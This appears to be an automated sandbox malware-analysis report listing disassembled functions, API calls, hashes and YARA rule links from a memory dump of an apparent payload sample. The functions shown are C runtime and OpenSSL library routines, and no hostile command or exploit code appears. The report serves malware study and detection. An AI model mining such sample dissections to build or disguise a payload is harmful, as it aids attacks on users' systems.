                                                                                                                                                                          • Part of subcall function 00300BED: HeapFree.KERNEL32(00000000,00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000), ref: 00300C01
                                                                                                                                                                          • Part of subcall function 00300BED: GetLastError.KERNEL32(00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC), ref: 00300C13
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3704956918-0
                                                                                                                                                                        • Opcode ID: 2610b3d8940f6a648ab1978d30ce714beceb0b0292dcd35d97a48f1907dae820
                                                                                                                                                                        • Instruction ID: 241a35edde0ca1b61110625e2c1b3383a44b2eb6025b192eed37918f510a6ff3
                                                                                                                                                                        • Opcode Fuzzy Hash: 2610b3d8940f6a648ab1978d30ce714beceb0b0292dcd35d97a48f1907dae820
                                                                                                                                                                        • Instruction Fuzzy Hash: 082188B1905745ABE71FAB748D52BAEB7D4AF08710F108525F4589F2C2EAB4E8C0CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00305141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __init_pointers.LIBCMT ref: 00305141
                                                                                                                                                                          • Part of subcall function 00307D6C: EncodePointer.KERNEL32(00000000,?,00305146,00303FFE,003E7990,00000014), ref: 00307D6F
                                                                                                                                                                          • Part of subcall function 00307D6C: __initp_misc_winsig.LIBCMT ref: 00307D8A
                                                                                                                                                                          • Part of subcall function 00307D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003126B3
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003126C7
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003126DA
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003126ED
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00312700
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00312713
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00312726
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00312739
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0031274C
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0031275F
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00312772
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00312785
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00312798
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003127AB
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003127BE
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003127D1
                                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00305146
                                                                                                                                                                        • __mtterm.LIBCMT ref: 0030514F
                                                                                                                                                                          • Part of subcall function 003051B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00305154,00303FFE,003E7990,00000014), ref: 00308B62
                                                                                                                                                                          • Part of subcall function 003051B7: _free.LIBCMT ref: 00308B69
                                                                                                                                                                          • Part of subcall function 003051B7: DeleteCriticalSection.KERNEL32(003EAC00,?,?,00305154,00303FFE,003E7990,00000014), ref: 00308B8B
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00305174
                                                                                                                                                                        • __initptd.LIBCMT ref: 00305196
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0030519D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                                                        • Opcode ID: 2606c96273241765938f9f889f0057c1de39fb977943bc9d2300c76ce0f10efa
                                                                                                                                                                        • Instruction ID: 16e491cf783ceeb03740f3061794ed58833569f0074d85d294d07ae8f253da8e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2606c96273241765938f9f889f0057c1de39fb977943bc9d2300c76ce0f10efa
                                                                                                                                                                        • Instruction Fuzzy Hash: 47F06D3255BB511EFA3F7778AC27B9B2A99DB01730F220619F0A4DD1D1EF2098424951
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003053AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 0030594A
                                                                                                                                                                          • Part of subcall function 00308AF7: __mtinitlocknum.LIBCMT ref: 00308B09
                                                                                                                                                                          • Part of subcall function 00308AF7: __amsg_exit.LIBCMT ref: 00308B15
                                                                                                                                                                          • Part of subcall function 00308AF7: EnterCriticalSection.KERNEL32(?,?,003050D7,0000000D), ref: 00308B22
                                                                                                                                                                        • _free.LIBCMT ref: 00305970
                                                                                                                                                                          • Part of subcall function 00300BED: HeapFree.KERNEL32(00000000,00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000), ref: 00300C01
                                                                                                                                                                          • Part of subcall function 00300BED: GetLastError.KERNEL32(00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC), ref: 00300C13
                                                                                                                                                                        • __lock.LIBCMT ref: 00305989
                                                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00305998
                                                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 003059B1
                                                                                                                                                                        • _free.LIBCMT ref: 003059C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                                                        • Opcode ID: 1276989447a0791eba20631077b2b344af3826525141928255d2dd8f27529079
                                                                                                                                                                        • Instruction ID: b0dc166a70fba19b2ab13883defe493fea607b00bd6af7f873b3c82d5444e8b0
                                                                                                                                                                        • Opcode Fuzzy Hash: 1276989447a0791eba20631077b2b344af3826525141928255d2dd8f27529079
                                                                                                                                                                        • Instruction Fuzzy Hash: 0501AD31503B04D6EB3BABA8D866B1F72A09F01731F21865EE0A45A0D1CFB09980CE51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003373F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                        • String ID: $+$0123456789ABCDEF$Ul3
                                                                                                                                                                        • API String ID: 1302938615-1236949915
                                                                                                                                                                        • Opcode ID: a9b9c2f3bcb302e88f801591fb5af8191e46f7283a08fc8509df71fc5fd3ff44
                                                                                                                                                                        • Instruction ID: 7e44b5b9d753b56482415e6e4e8067378cc2eac3939520fb4c674d8696df100b
                                                                                                                                                                        • Opcode Fuzzy Hash: a9b9c2f3bcb302e88f801591fb5af8191e46f7283a08fc8509df71fc5fd3ff44
                                                                                                                                                                        • Instruction Fuzzy Hash: C381ACB1A0C7519FD722CF29C881A2BBBE5BFC9744F15091DF989A7252D330ED018B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003306A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 003307C3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                                                        • Opcode ID: f600b5016774424dce6f819119cf9549f11e873fe8710df72a4616d100d853b7
                                                                                                                                                                        • Instruction ID: f8b99194a50c228b2b0474896f40b408f04b16e090591996c02a89c5b6382046
                                                                                                                                                                        • Opcode Fuzzy Hash: f600b5016774424dce6f819119cf9549f11e873fe8710df72a4616d100d853b7
                                                                                                                                                                        • Instruction Fuzzy Hash: 85412871A043059FD725EE24CC92BAFB3D8EF85748F40482EF585A7241E671E908CBE2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0033AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$g94
                                                                                                                                                                        • API String ID: 2102423945-1741298942
                                                                                                                                                                        • Opcode ID: 098fa258f716964991cf1fa61304d3dad753ff81a626102a8de5d36ea7ae7e54
                                                                                                                                                                        • Instruction ID: dc17c662aaa910b2bb9c1beea7b5bec7bafff45f852d6b1b090c2651d46f6515
                                                                                                                                                                        • Opcode Fuzzy Hash: 098fa258f716964991cf1fa61304d3dad753ff81a626102a8de5d36ea7ae7e54
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D2123B6B007217FE215666CFC82F56F399EB84B14F004029F258DB2C1E2A0EC10C3D5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003A5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 003A5D3D
                                                                                                                                                                          • Part of subcall function 0030501F: GetLastError.KERNEL32(?,?,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC,000000FF), ref: 00305021
                                                                                                                                                                          • Part of subcall function 0030501F: __calloc_crt.LIBCMT ref: 00305042
                                                                                                                                                                          • Part of subcall function 0030501F: __initptd.LIBCMT ref: 00305064
                                                                                                                                                                          • Part of subcall function 0030501F: GetCurrentThreadId.KERNEL32 ref: 0030506B
                                                                                                                                                                          • Part of subcall function 0030501F: SetLastError.KERNEL32(00000000,?,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC,000000FF), ref: 00305083
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 003A5D60
                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 003A5D7E
                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 003A5DCD
                                                                                                                                                                        Strings
                                                                                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 003A5D48, 003A5D6E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                        • API String ID: 3123740607-798102604
                                                                                                                                                                        • Opcode ID: 0e9aebaaec98feef76dab53e9a749cb1fa772d648512cf7f65fc9eddf5d48993
                                                                                                                                                                        • Instruction ID: 91bd6a73519b2e1b30a33a23c698046436dfc384137dc753e454ebfff79a0a8b
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e9aebaaec98feef76dab53e9a749cb1fa772d648512cf7f65fc9eddf5d48993
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B11E772602E156BEB237B65AC05AAF739CEF16760F110826FE05DE681E621DD0142A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00342FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fprintf_memset
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                                                                                        • Opcode ID: 7007043cfcec50146473c21c0b6322bfc9b336b3b3a76f9bfcdbf8ab7eeffecb
                                                                                                                                                                        • Instruction ID: 9454ffa25f4d3ddad69935dd952b13e883ff12d8678db6d58ddb3f3d5bf4534a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7007043cfcec50146473c21c0b6322bfc9b336b3b3a76f9bfcdbf8ab7eeffecb
                                                                                                                                                                        • Instruction Fuzzy Hash: 272157B2A043113BE722A9266C42FBB77D99FC1798F054618FE50AF1C2DA21ED0543A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003216EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00321726
                                                                                                                                                                        • _strlen.LIBCMT ref: 00321734
                                                                                                                                                                          • Part of subcall function 00305208: __getptd_noexit.LIBCMT ref: 00305208
                                                                                                                                                                        • _strnlen.LIBCMT ref: 003217BF
                                                                                                                                                                        • __lock.LIBCMT ref: 003217D0
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 003217DB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                                                        • Opcode ID: 97274d1ee43b687a79e5c7533eded4f80990259db42fddc44148853551dbfcce
                                                                                                                                                                        • Instruction ID: 696e43bc12e99dc649d23618dd113f645aaaeb1841af17edac4ae3a581385c16
                                                                                                                                                                        • Opcode Fuzzy Hash: 97274d1ee43b687a79e5c7533eded4f80990259db42fddc44148853551dbfcce
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A31F932A02235AADB236BACAD01B9F76985FA5B20F150525F914DF1C1DF75C90087A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0031B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 0031B70B
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _free.LIBCMT ref: 0031B71E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
